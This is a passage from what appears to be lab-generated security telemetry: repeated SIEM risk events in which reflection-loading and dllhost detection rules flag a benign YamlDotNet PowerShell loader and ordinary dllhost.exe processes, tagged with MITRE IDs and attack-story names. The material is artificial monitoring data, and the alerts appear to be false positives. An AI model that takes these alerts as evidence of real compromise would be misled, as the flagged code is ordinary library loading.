\"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664834132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664834132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T20:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T20:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664827200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664827200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5148", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664827200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664827200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="15452", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664827200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664827200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3c5c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664827200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664827200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x141c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664830532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664830532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664830532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host 